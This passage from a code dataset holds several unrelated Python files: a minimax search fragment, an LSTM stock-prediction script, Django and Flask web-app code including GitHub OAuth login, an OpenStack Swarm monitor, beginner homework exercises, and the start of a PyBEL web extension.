previous player is the winner.\n return INFINITY if game_state.curr_player != self.my_color else -INFINITY, None\n\n if maximizing_player:\n selected_move = next_moves[0]\n best_move_utility = -INFINITY\n for move in next_moves:\n new_state = game_state.cp()\n new_state.perform_move((move, 0))\n # print(new_state.board)\n\n minimax_value, _ = self.search(new_state, depth - 1, alpha, beta, False)\n alpha = max(alpha, minimax_value)\n if minimax_value > best_move_utility:\n best_move_utility = minimax_value\n selected_move = move\n if beta <= alpha or self.no_more_time():\n break\n return alpha, selected_move\n\n else:\n for move in next_moves:\n new_state = game_state.cp()\n new_state.perform_move((move, 0))\n beta = min(beta, self.search(new_state, depth - 1, alpha, beta, True)[0])\n if beta <= alpha or self.no_more_time():\n break\n return beta, None\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"374088540","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 17 02:28:05 2020\n\n@author: gbson\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom stockstats import StockDataFrame as Sdf\nimport pandas_datareader.data as web\nimport os\nimport time\n\nos.chdir('/home/gbson/Downloads/Recurrent_Neural_Networks/indicators_research')\n\nmsft = pd.read_pickle('MSFT.pkl')\n\nstock = Sdf.retype(msft)\n\n# volume delta against previous day\nstock['volume_delta']\n\n# open delta against next 2 day\nstock['open_2_d']\n\n# open price change (in percent) between today and the day before yesterday\n# 'r' stands for rate.\nstock['open_-2_r']\n\n# CR indicator, including 5, 10, 20 days moving average\nstock['cr']\nstock['cr-ma1']\nstock['cr-ma2']\nstock['cr-ma3']\n\n# volume max of three days ago, yesterday and two days later\nstock['volume_-3,2,-1_max']\n\n# volume min between 3 days ago and tomorrow\nstock['volume_-3~1_min']\n\n# KDJ, default to 9 days\nstock['kdjk']\nstock['kdjd']\nstock['kdjj']\n\n# three days KDJK cross up 3 days KDJD\n'''\nstock['kdj_3_xu_kdjd_3']\n'''\n\n# 2 days simple moving average on open price\nstock['open_2_sma']\n\n# MACD\nstock['macd']\n# MACD signal line\nstock['macds']\n# MACD histogram\nstock['macdh']\n\n# bolling, including upper band and lower band\nstock['boll']\nstock['boll_ub']\nstock['boll_lb']\n\n# close price less than 10.0 in 5 days count\nstock['close_10.0_le_5_c']\n\n# CR MA2 cross up CR MA1 in 20 days count\nstock['cr-ma2_xu_cr-ma1_20_c']\n\n# count forward(future) where close prise is larger than 10\nstock['close_10.0_ge_5_fc']\n\n# 6 days RSI\nstock['rsi_6']\n# 12 days RSI\nstock['rsi_12']\n\n# 10 days WR\nstock['wr_10']\n# 6 days WR\nstock['wr_6']\n\n# CCI, default to 14 days\nstock['cci']\n# 20 days CCI\nstock['cci_20']\n\n# TR (true range)\nstock['tr']\n# ATR (Average True Range)\nstock['atr']\n\n# DMA, difference of 10 and 50 moving average\nstock['dma']\n\n# DMI\n# +DI, default to 14 days\nstock['pdi']\n# -DI, default to 14 days\nstock['mdi']\n# DX, default to 14 days of +DI and -DI\nstock['dx']\n# ADX, 6 days SMA of DX, same as stock['dx_6_ema']\nstock['adx']\n# ADXR, 6 days SMA of ADX, same as stock['adx_6_ema']\nstock['adxr']\n\n# TRIX, default to 12 days\nstock['trix']\n# MATRIX is the simple moving average of TRIX\nstock['trix_9_sma']\n# TEMA, another implementation for triple ema\nstock['tema']\n\n# VR, default to 26 days\nstock['vr']\n# MAVR is the simple moving average of VR\nstock['vr_6_sma']\n\n\n\n# ticker name\nticker = 'MSFT'\n\n\n\n\n# manual tunning\n\ntimestep = 30\n\n\n\n\n\n\n\n\n\n# data preprocessing\n\n\n# filtrando na's\n\nstock.isnull().values.any()\nisnull = stock.isnull().any()\n\nstock_clean = stock.iloc[10:len(stock), :]\n\nstock_clean.isnull().values.any()\nisnull = stock_clean.isnull().any()\n\nstock_clean = stock_clean.iloc[:len(stock_clean) - 2, :]\n\nstock_clean.isnull().values.any()\nisnull = stock_clean.isnull().any()\n\n\n# removendo colunas indesejadas\nstock_clean.drop([ 'close_10.0_le', 'close_10.0_le_5_c', 'cr-ma1_20_c', 'cr-ma2_xu_cr-ma1_20_c', 'close_10.0_ge', 'close_10.0_ge_5_fc'],axis=1, inplace=True) # 1 = colunas | 0 = linhas\ndataset = stock_clean\ndataset = dataset.values\n\n# creating the benchmark dataset\ndataset_benchmarked = dataset[:100, :]\n\n# Feature Scaling\nfrom sklearn.preprocessing import MinMaxScaler\nsc = MinMaxScaler(feature_range = (0, 1))\n\ndataset_benchmarked_scaled = sc.fit_transform(dataset_benchmarked)\n\n\n# separando os datasets\ny = dataset_benchmarked_scaled[: ,3]\nX = dataset_benchmarked_scaled\n\nclose = dataset[: ,3]\nclose = close.reshape(-1,1)\nclose_scaled = sc.fit_transform(close)\n\n# Creating a data structure with 60 timesteps and 1 output\nX_train = [] # coleção de 60 dias antes do y\ny_train = [] # close\nfor i in range(timestep, len(X)):\n X_train.append(X[i-timestep:i, :])\n y_train.append(y[i])\nX_train, y_train = np.array(X_train), np.array(y_train)\n\n# Reshaping\nX_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 83)) # 83 = número de colunas\n\n\n\n# Part 2 - Building the RNN\n\n# Importing the Keras libraries and packages\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\n# Initialising the RNN\nregressor = Sequential()\n\n# Adding the first LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50, return_sequences = True, input_shape = (X_train.shape[1], 83))) # 83 inputs\nregressor.add(Dropout(0.2))\n\n# Adding a second LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50, return_sequences = True))\nregressor.add(Dropout(0.2))\n\n# Adding a third LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50, return_sequences = True))\nregressor.add(Dropout(0.2))\n\n# Adding a fourth LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50)) # não retorna nenhum valor para o início da NN\nregressor.add(Dropout(0.2))\n\n# Adding the output layer\nregressor.add(Dense(units = 1)) # units = 1 | pois só queremos 1 output\n\n# Compiling the RNN\nregressor.compile(optimizer = 'RMSprop', loss = 'mean_squared_error')\n# loss = 'mean_squared_error' | pois estamos fazendo uma regressão\n\n# Keras nos recomenda RMSprop como optimizer de RNNs, porém 'adam' tem melhor\n# performance neste modelo\n\n# Fitting the RNN to the Training set\nstart = time.time()\nregressor.fit(X_train, y_train, epochs = 100, batch_size = 32)\nend = time.time()\nend - start\n# batch_size = número de dados forward-propagated antes de ocorrer uma back-propagation\n\n\ninputs = dataset_benchmarked[len(dataset_benchmarked) - timestep - 30:]\n'''\ninputs.reshape(-1 ,1)\n'''\ninputs = sc.transform(inputs)\n\nX_test = []\nfor i in range(30, len(inputs)):\n X_test.append(inputs[i-30:i, :])\nX_test = np.array(X_test)\n\n'''\nX_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 83))\n'''\n# o código acima é desnecessário parece\n\npredicted_stock_price = regressor.predict(X_test)\npredicted_stock_price = sc.inverse_transform(predicted_stock_price) # este\n# comando desescalona os dados escalonados.\n\ny_test = dataset_benchmarked[len(dataset_benchmarked) - timestep:, 3]\n\n\n\n# visualizando os resultados\nplt.plot(y_test, color = 'red', label = 'Preço real')\nplt.plot(predicted_stock_price, color = 'blue', label = 'Preço predito')\nplt.title('{} Stock Price Prediction'.format(ticker))\nplt.xlabel('Time')\nplt.ylabel('{} Stock Price'.format(ticker))\nplt.legend()\nplt.show\n\nreal_stock_price = y_test\n\n# calculating the accuracy of the model\npredicted_dia_anterior = []\nfor i in range(0, len(predicted_stock_price) - 1):\n predicted_dia_anterior.append(predicted_stock_price[i])\npredicted_dia_anterior = np.array(predicted_dia_anterior)\n\npredicted_dia_posterior = []\nfor i in range(1, len(predicted_stock_price)):\n predicted_dia_posterior.append(predicted_stock_price[i])\npredicted_dia_posterior = np.array(predicted_dia_posterior)\n\nvar_sd = predicted_dia_posterior - predicted_dia_anterior\n\nsubiu_desceu_predicted = []\nfor i in range(0, len(var_sd)):\n if (var_sd[i] > 0):\n subiu_desceu_predicted.append(1)\n elif (var_sd[i] < 0):\n subiu_desceu_predicted.append(0)\n elif (var_sd[i] == 0):\n subiu_desceu_predicted.append('no variance')\n\n\n\npredicted_dia_anterior_real = []\nfor i in range(0, len(real_stock_price) - 1):\n predicted_dia_anterior_real.append(real_stock_price[i])\npredicted_dia_anterior_real = np.array(predicted_dia_anterior_real)\n\npredicted_dia_posterior_real = []\nfor i in range(1, len(real_stock_price)):\n predicted_dia_posterior_real.append(real_stock_price[i])\npredicted_dia_posterior_real = np.array(predicted_dia_posterior_real)\n\nvar_sd_real = predicted_dia_posterior_real - predicted_dia_anterior_real\n\nsubiu_desceu_real = []\nfor i in range(0, len(var_sd_real)):\n if (var_sd_real[i] > 0):\n subiu_desceu_real.append(1)\n elif (var_sd_real[i] < 0):\n subiu_desceu_real.append(0)\n elif (var_sd_real[i] == 0):\n subiu_desceu_real.append('no variance')\n \nacc = []\nfor i in range(0, len(subiu_desceu_real)):\n if (subiu_desceu_real[i] == subiu_desceu_predicted[i]):\n acc.append(1)\n else:\n acc.append(0)\n\ntotal_acc = (sum(acc) / len(acc)) * 100\ntotal_acc\n\na1 = end - start\nminute = int(a1 / 60)\n\nprint(\"A RNN demorou {} segundos ou {} minuto(s) para treinar\".format(a1, minute))\n\n\n\n\n\n\n# Tunning the RNN\nfrom sklearn.model_selection import cross_val_score\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\ndef build_regressor(optimizer):\n regressor = Sequential()\n\n regressor.add(LSTM(units = 50, return_sequences = True, input_shape = (X_train.shape[1], 83))) # 83 inputs\n regressor.add(Dropout(0.2))\n\n regressor.add(LSTM(units = 50, return_sequences = True))\n regressor.add(Dropout(0.2))\n\n regressor.add(LSTM(units = 50, return_sequences = True))\n regressor.add(Dropout(0.2))\n\n regressor.add(LSTM(units = 50)) # não retorna nenhum valor para o início da NN\n regressor.add(Dropout(0.2))\n\n regressor.add(Dense(units = 1)) # units = 1 | pois só queremos 1 output\n\n regressor.compile(optimizer = 'RMSprop', loss = 'mean_squared_error')\n return regressor\n# loss = 'mean_squared_error' | pois estamos fazendo uma regressão\n\n# Keras nos recomenda RMSprop como optimizer de RNNs, porém 'adam' tem melhor\n# performance neste modelo\nregressor = KerasClassifier(build_fn = build_regressor)\nparameters = {'batch_size': [12, 24, 36, 48, 60],\n 'epochs': [100, 250, 500, 750, 1000],\n 'optimizer': ['adam', 'rmsprop']}\n\ngrid_search = GridSearchCV(estimator = regressor,\n param_grid = parameters,\n scoring = 'neg_mean_squared_error',\n cv = 10)\n\ngrid_search = grid_search.fit(X_train, y_train)\nbest_parameters = grid_search.best_params_\nbest_accuracy = grid_search.best_score_\n\n\n\n# Fitting the RNN to the Training set\nstart = time.time()\nregressor.fit(X_train, y_train, epochs = 100, batch_size = 32)\nend = time.time()\nend - start\n\n","sub_path":"RNN/Recurrent_Neural_Networks/scripts/rnn_tunning/indicators_benchmarked.py","file_name":"indicators_benchmarked.py","file_ext":"py","file_size_in_byte":10128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"56215668","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('habits/', views.user_profile, name='user-profile'),\n path('habits/', views.habit_detail, name='habit-detail'),\n]\n\n# views for creating and deleting habits\nurlpatterns += [\n path('habits/new/', views.new_habit, name='new-habit'),\n path('habits//delete/',\n views.HabitDelete.as_view(),\n name='habit-delete'),\n]\n\n# views for creating, updating, and deleting dailyrecords\nurlpatterns += [\n path('habits//new/', views.new_daily_record, name='new-record'),\n path('records//update/',\n views.DailyRecordUpdate.as_view(),\n name='update-record'),\n path('records//delete/',\n views.DailyRecordDelete.as_view(),\n name='delete-record'),\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177568421","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom oslo_log import log\n\nfrom magnum.common import docker_utils\nfrom magnum.conductor import monitors\n\nLOG = log.getLogger(__name__)\n\n\nclass SwarmMonitor(monitors.MonitorBase):\n\n def __init__(self, context, cluster):\n super(SwarmMonitor, self).__init__(context, cluster)\n self.data = {}\n self.data['nodes'] = []\n self.data['containers'] = []\n\n @property\n def metrics_spec(self):\n return {\n 'memory_util': {\n 'unit': '%',\n 'func': 'compute_memory_util',\n },\n }\n\n def pull_data(self):\n with docker_utils.docker_for_cluster(self.context,\n self.cluster) as docker:\n system_info = docker.info()\n self.data['nodes'] = self._parse_node_info(system_info)\n\n # pull data from each container\n containers = []\n for container in docker.containers(all=True):\n try:\n container = docker.inspect_container(container['Id'])\n except Exception as e:\n LOG.warning(\"Ignore error [%(e)s] when inspecting \"\n \"container %(container_id)s.\",\n {'e': e, 'container_id': container['Id']},\n exc_info=True)\n containers.append(container)\n self.data['containers'] = containers\n\n def compute_memory_util(self):\n mem_total = 0\n for node in self.data['nodes']:\n mem_total += node['MemTotal']\n mem_reserved = 0\n for container in self.data['containers']:\n mem_reserved += container['HostConfig']['Memory']\n\n if mem_total == 0:\n return 0\n else:\n return mem_reserved * 100 / mem_total\n\n def _parse_node_info(self, system_info):\n \"\"\"Parse system_info to retrieve memory size of each node.\n\n :param system_info: The output returned by docker.info(). Example:\n {\n u'Debug': False,\n u'NEventsListener': 0,\n u'DriverStatus': [\n [u'\\x08Strategy', u'spread'],\n [u'\\x08Filters', u'...'],\n [u'\\x08Nodes', u'2'],\n [u'node1', u'10.0.0.4:2375'],\n [u' \\u2514 Containers', u'1'],\n [u' \\u2514 Reserved CPUs', u'0 / 1'],\n [u' \\u2514 Reserved Memory', u'0 B / 2.052 GiB'],\n [u'node2', u'10.0.0.3:2375'],\n [u' \\u2514 Containers', u'2'],\n [u' \\u2514 Reserved CPUs', u'0 / 1'],\n [u' \\u2514 Reserved Memory', u'0 B / 2.052 GiB']\n ],\n u'Containers': 3\n }\n :return: Memory size of each node. Excample:\n [{'MemTotal': 2203318222.848},\n {'MemTotal': 2203318222.848}]\n \"\"\"\n nodes = []\n for info in system_info['DriverStatus']:\n key = info[0]\n value = info[1]\n if key == u' \\u2514 Reserved Memory':\n memory = value # Example: '0 B / 2.052 GiB'\n memory = memory.split('/')[1].strip() # Example: '2.052 GiB'\n memory = memory.split(' ')[0] # Example: '2.052'\n memory = float(memory) * 1024 * 1024 * 1024\n nodes.append({'MemTotal': memory})\n return nodes\n","sub_path":"magnum/drivers/swarm_fedora_atomic_v2/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"345878774","text":"import os\nfrom flask import Flask, app, render_template, redirect, url_for, request, abort\nfrom functools import wraps\nimport requests\nfrom flask_login import LoginManager, login_required, login_user, current_user\nfrom oauthlib.oauth2 import WebApplicationClient\n\nfrom todo_app.data.mongodb import MongoDB\nfrom todo_app.user import User\nfrom todo_app.view_model import ViewModel\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = os.getenv('SECRET_KEY')\n app.config['LOGIN_DISABLED'] = os.getenv('LOGIN_DISABLED')\n database = MongoDB()\n\n ## Auth Service Setup\n login_manager = LoginManager()\n login_manager.init_app(app)\n\n client_id = os.getenv(\"AUTH_CLIENT_ID\")\n client_secret = os.getenv(\"AUTH_CLIENT_SECRET\")\n authorization_base_url = 'https://github.com/login/oauth/authorize'\n token_url = 'https://github.com/login/oauth/access_token'\n\n auth_client = WebApplicationClient(client_id)\n auth_client.prepare_request_uri(authorization_base_url)\n\n @login_manager.unauthorized_handler\n def unauthenticated():\n return redirect(auth_client.prepare_request_uri(authorization_base_url))\n\n @login_manager.user_loader\n def load_user(user_id):\n return User(user_id)\n\n @app.route('/login/')\n def login():\n code = request.args.get('code')\n token_request_url, token_request_headers, token_request_body = auth_client.prepare_token_request(token_url, authorization_response=request.url, client_secret=client_secret)\n token_request_response = requests.post(token_request_url, headers=token_request_headers, data=token_request_body)\n auth_client.parse_request_body_response(token_request_response.content.decode())\n user_request_url, user_request_headers, user_request_body = auth_client.add_token(\"https://api.github.com/user\")\n user_request_response = requests.get(user_request_url, headers=user_request_headers, data=user_request_body)\n user_name = user_request_response.json()['login']\n user = User(user_name)\n login_user(user)\n return redirect(url_for('index'))\n\n def writer_required(f):\n @login_required\n @wraps(f)\n def decorated_function(*args, **kwargs):\n user = User(current_user.id)\n if not user.is_writer() and not app.config.get('LOGIN_DISABLED'):\n abort(401, \"Permission Denied\")\n return f(*args, **kwargs)\n return decorated_function\n\n @app.route('/')\n @login_required\n def index():\n user = User(current_user.id)\n items = database.get_items()\n view_model_items = ViewModel(items)\n return render_template('index.html', items = view_model_items, read_only = not user.is_writer())\n\n\n @app.route('/items/new', methods=['POST'])\n @writer_required\n def add_item():\n name = request.form['name']\n database.add_item(name)\n return redirect(url_for('index'))\n\n\n @app.route('/items//start')\n @writer_required\n def start_item(id):\n database.start_item(id)\n return redirect(url_for('index')) \n\n\n @app.route('/items//complete')\n @writer_required\n def complete_item(id):\n database.complete_item(id)\n return redirect(url_for('index'))\n\n\n @app.route('/items//uncomplete')\n @writer_required\n def uncomplete_item(id):\n database.uncomplete_item(id)\n return redirect(url_for('index')) \n\n\n @app.route('/items//delete')\n @writer_required\n def delete_item(id):\n database.delete_item(id)\n return redirect(url_for('index'))\n\n\n if __name__ == '__main__':\n app.run(host='0.0.0.0')\n \n return app\n ","sub_path":"todo_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"91290830","text":"from random import randint\nimport math\n\n# 1) Write a function that emulates the game \"rock, scissors, paper\"\n# At the entrance, your function accepts your version printed from the console, the computer makes a decision randomly.\n\n\ndef game_rsp(player):\n choice = {1: 'Rock',\n 2: 'SCISSORS',\n 3: 'PAPER'\n }\n computer = randint(1, 3)\n win = ''\n if computer == player:\n win = 'DRAW'\n if player == 1 and computer == 2:\n win = 'player'\n if player == 1 and computer == 3:\n win = 'computer'\n if player == 2 and computer == 1:\n win = 'computer'\n if player == 2 and computer == 3:\n win = 'player'\n if player == 3 and computer == 1:\n win = 'player'\n if player == 3 and computer == 2:\n win = 'computer'\n print(f'player entered {choice.get(player)}\\ncomputer choice {choice.get(computer)}\\nwin {win}')\n\n\nplayer_ = int(input('Entered 1 = ROCK 2 = SCISSORS 3 = PAPER: '))\ngame_rsp(player_)\n\n# 2)Try to imagine a world in which you might have to stay home for (Corona virus) 14 days at any given time.\n# Do you have enough toilet paper(TP) to make it through?\n# Although the number of squares per roll of TP varies significantly, we'll assume each roll has 500 sheets,\n# and the average person uses 57 sheets per day.\n\n# Create a function that will receive a dictionary with two key/values:\n# \"people\" ⁠— Number of people in the household.\n# \"tp\" ⁠— Number of rolls.\n# Return a statement telling the user if they need to buy more TP!\n\n\ndef count_rolls(people=1, tp=0):\n need_rolls = math.ceil(people*57*14/500)\n if need_rolls <= tp:\n print('You have enough toilet paper')\n else:\n to_buy = need_rolls - tp\n print(f'You need to buy {to_buy} rolls')\n\n\ndictionary = {\n \"people\": 3,\n \"tp\": 1\n}\n\n\ndef count_rolls1(dict_):\n need_rolls = math.ceil(dict_.get('people')*57*14/500)\n if need_rolls <= dict_.get('tp'):\n print('You have enough toilet paper')\n else:\n to_buy = need_rolls - dict_.get('tp')\n print(f'You need to buy {to_buy} rolls')\n\n\ncount_rolls(3, 1)\ncount_rolls1(dictionary)\n\n\n# 3) Make a function that encrypts a given input with these steps:\n# Input: \"apple\"\n# Step 1: Reverse the input: \"elppa\"\n# Step 2: Replace all vowels using the following chart:\n# a => 0\n# e => 1\n# i => 2\n# o => 2\n# u => 3\n# # \"1lpp0\"\n# Example:\n# encrypt(\"banana\") ➞ \"0n0n0baca\"\n# encrypt(\"karaca\") ➞ \"0c0r0kaca\"\n# encrypt(\"burak\") ➞ \"k0r3baca\"\n# encrypt(\"alpaca\") ➞ \"0c0pl0aca\"\n\n\ndef encrypt(line):\n charts = {\n 'a': 0,\n 'e': 1,\n 'i': 2,\n 'o': 2,\n 'u': 3\n }\n line = line[::-1]\n result = ''\n for ch in line:\n if ch in charts.keys():\n result += str(charts[ch])\n else:\n result += ch\n return result\n\n\nprint(encrypt(input('Entered line: ')))\n\n\n# **4)Given a 3x3 matrix of a completed tic-tac-toe game, create a function that returns whether the game is a win\n# for \"X\", \"O\", or a \"Draw\", where \"X\" and \"O\" represent themselves on the matrix, and \"E\" represents an empty spot.\n# Example:\n\ntic_tac_toe = ([\n [\"X\", \"O\", \"X\"],\n [\"O\", \"X\", \"O\"],\n [\"O\", \"X\", \"X\"]]) #➞ \"X\"\n#\ntic_tac_toe1 =([\n [\"O\", \"O\", \"O\"],\n [\"O\", \"X\", \"X\"],\n [\"E\", \"X\", \"X\"]\n ]) #➞ \"O\"\n#\n\ntic_tac_toe2 = ([\n [\"X\", \"X\", \"0\"],\n [\"0\", \"O\", \"X\"],\n [\"X\", \"X\", \"O\"]])\n# ➞ \"Draw\"\n\n\ndef is_win(array):\n\n def horizontal():\n for i in range(len(array)):\n w = array[i][0]\n win = 'Draw'\n for j in range(len(array)):\n\n if array[i][j] == w and array[i][j] != 'E':\n win = array[i][0]\n continue\n else:\n win = 'Draw'\n break\n return win\n\n def vertical():\n for i in range(len(array)):\n w = array[i][0]\n win = 'Draw'\n for j in range(len(array)):\n\n if array[j][i] == w and array[j][i] != 'E':\n\n win = array[j][i]\n continue\n else:\n win = 'Draw'\n break\n return win\n\n def diagonal():\n win = 'Draw'\n for x in range(len(array)):\n w = array[0][0]\n if array[x][x] == w and array[x][x] != 'E':\n win = array[x][x]\n continue\n else:\n win = 'Draw'\n break\n\n if win == 'Draw':\n for i in range(len(array)):\n y = len(array) - 1 - i\n w = array[i][len(array) - 1]\n if array[i][y] == w and array[i][y] != 'E':\n win = array[i][y]\n continue\n else:\n win = 'Draw'\n break\n return win\n\n if horizontal() != 'Draw':\n winner = horizontal()\n elif vertical() != 'Draw':\n winner = vertical()\n elif diagonal() != 'Draw':\n winner = diagonal()\n else:\n winner = 'draw'\n\n print(winner)\n\n\nis_win(tic_tac_toe)\nis_win(tic_tac_toe1)\nis_win(tic_tac_toe2)","sub_path":"home_work_4.py","file_name":"home_work_4.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"82141152","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom djauth.decorators import portal_auth_required\nfrom djmapache.commonapp.forms import UploadForm\n\n\ndef handle_uploaded_file(phile):\n \"\"\"Save uploaded file to the file system.\"\"\"\n sendero = '{0}{1}'.format(settings.COMMONAPP_CSV_OUTPUT, phile.name)\n with open(sendero, 'wb+') as destination:\n for chunk in phile.chunks():\n destination.write(chunk)\n\n\n@portal_auth_required(\n session_var='DJMAPACHE_AUTH',\n redirect_url=reverse_lazy('access_denied')\n)\ndef upload(request):\n \"\"\"Upload commonapp data file.\"\"\"\n if request.method == 'POST':\n form = UploadForm(request.POST, request.FILES)\n if form.is_valid():\n handle_uploaded_file(request.FILES['phile'])\n return HttpResponseRedirect(reverse_lazy('upload_success'))\n else:\n form = UploadForm()\n\n response = render(request, 'commonapp/upload.html', {'form': form})\n return response\n","sub_path":"djmapache/commonapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"535275235","text":"from django.db import models\r\nfrom threads.models import Thread\r\nfrom django.conf import settings\r\nfrom mptt.models import MPTTModel, TreeForeignKey\r\nimport uuid as uuid_lib\r\n# from shortuuidfield import ShortUUIDField\r\nimport shortuuid\r\n\r\nUser = settings.AUTH_USER_MODEL\r\n\r\n\r\nclass CommentManager(models.Manager):\r\n def all(self):\r\n qs = super(CommentManager, self).filter(parent=None)\r\n return qs\r\n\r\n\r\nclass Comment(MPTTModel):\r\n\r\n uuid = models.UUIDField(db_index=True,\r\n default=uuid_lib.uuid4,\r\n editable=False)\r\n body = models.CharField(max_length=280)\r\n comment_on = models.ForeignKey(Thread, on_delete=models.CASCADE, null=True, related_name='comments')\r\n parent = TreeForeignKey('self', null=True, blank=True, related_name='replies', db_index=True, on_delete=models.CASCADE)\r\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user')\r\n created_on = models.DateTimeField(auto_now_add=True, editable=False)\r\n\r\n # url = ShortUUIDField(db_index=True, default=uuid_lib.uuid4, editable=False, unique=True)\r\n\r\n objects = CommentManager()\r\n\r\n class MPTTMeta:\r\n order_insertion_by = ['created_on']\r\n\r\n def __str__(self):\r\n return str(f'{self.user}: {self.body[:50]}...')\r\n\r\n def children(self):\r\n return Comment.objects.filter(parent=self)\r\n\r\n @property\r\n def is_parent(self):\r\n if self.parent is not None:\r\n return False\r\n return True\r\n","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"1621945","text":"# -*- coding: utf-8 -*-\n\n\"\"\"An extension to Flask-SQLAlchemy.\"\"\"\n\nimport datetime\nimport logging\nfrom typing import Dict, Iterable, Optional\n\nfrom flask import Flask, g, render_template\nfrom flask_admin import Admin\nfrom flask_security import SQLAlchemyUserDatastore\nfrom raven.contrib.flask import Sentry\n\nfrom pybel import BELGraph, Manager\nfrom pybel.examples import braf_graph, egf_graph, homology_graph, sialic_acid_graph, statin_graph\nfrom pybel.manager.models import Author, Citation, Edge, Evidence, Namespace, NamespaceEntry, Network, Node\nfrom pybel.struct.mutation import expand_node_neighborhood, expand_nodes_neighborhoods, infer_child_relations\nfrom pybel.struct.pipeline import in_place_transformation, uni_in_place_transformation\nfrom .admin_model_views import (\n CitationView, EdgeView, EvidenceView, ExperimentView, ModelView, NamespaceView, NetworkView, NodeView, QueryView,\n ReportView, UserView, build_project_view,\n)\nfrom .constants import SENTRY_DSN\nfrom .manager_utils import insert_graph\nfrom .models import Assembly, EdgeComment, EdgeVote, Experiment, NetworkOverlap, Query, Report, Role, User, UserQuery\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\n\ndef register_transformations(manager: Manager) -> None: # noqa: D202\n \"\"\"Register several manager-based PyBEL transformation functions.\"\"\"\n\n @uni_in_place_transformation\n def expand_nodes_neighborhoods_by_ids(universe: BELGraph, graph: BELGraph, node_hashes: Iterable[str]) -> None:\n \"\"\"Expand around the neighborhoods of a list of nodes by identifier.\"\"\"\n nodes = [\n manager.get_dsl_by_hash(node_hash)\n for node_hash in node_hashes\n ]\n return expand_nodes_neighborhoods(universe, graph, nodes)\n\n @uni_in_place_transformation\n def expand_node_neighborhood_by_id(universe: BELGraph, graph: BELGraph, node_hash: str) -> None:\n \"\"\"Expand around the neighborhoods of a node by identifier.\"\"\"\n node = manager.get_dsl_by_hash(node_hash)\n return expand_node_neighborhood(universe, graph, node)\n\n @in_place_transformation\n def delete_nodes_by_ids(graph: BELGraph, node_hashes: Iterable[str]) -> None:\n \"\"\"Remove a list of nodes by identifier.\"\"\"\n nodes = [\n manager.get_dsl_by_hash(node_hash)\n for node_hash in node_hashes\n ]\n graph.remove_nodes_from(nodes)\n\n @in_place_transformation\n def delete_node_by_id(graph: BELGraph, node_hash: str) -> None:\n \"\"\"Remove a node by its SHA512.\"\"\"\n node = manager.get_dsl_by_hash(node_hash)\n graph.remove_node(node)\n\n @in_place_transformation\n def propagate_node_by_hash(graph: BELGraph, node_hash: str) -> None:\n \"\"\"Infer relationships from a node by its SHA512.\"\"\"\n node = manager.get_dsl_by_hash(node_hash)\n infer_child_relations(graph, node)\n\n\ndef register_users_from_manifest(user_datastore: SQLAlchemyUserDatastore, manifest: Dict) -> None:\n \"\"\"Register the users and roles in a manifest.\n\n :param user_datastore: A user data store\n :param dict manifest: A manifest dictionary, which contains two keys: ``roles`` and ``users``. The ``roles``\n key corresponds to a list of dictionaries containing ``name`` and ``description`` entries. The ``users`` key\n corresponds to a list of dictionaries containing ``email``, ``password``, and ``name`` entries\n as well as a optional ``roles`` entry with a corresponding list relational to the names in the ``roles``\n entry in the manifest.\n \"\"\"\n for role in manifest['roles']:\n user_datastore.find_or_create_role(**role)\n\n for user_manifest in manifest['users']:\n email = user_manifest['email']\n user = user_datastore.find_user(email=email)\n if user is None:\n logger.info(f'creating user: {email}')\n user = user_datastore.create_user(\n confirmed_at=datetime.datetime.now(),\n email=email,\n password=user_manifest['password'],\n name=user_manifest['name'],\n )\n\n for role_name in user_manifest.get('roles', []):\n if user_datastore.add_role_to_user(user, role_name):\n 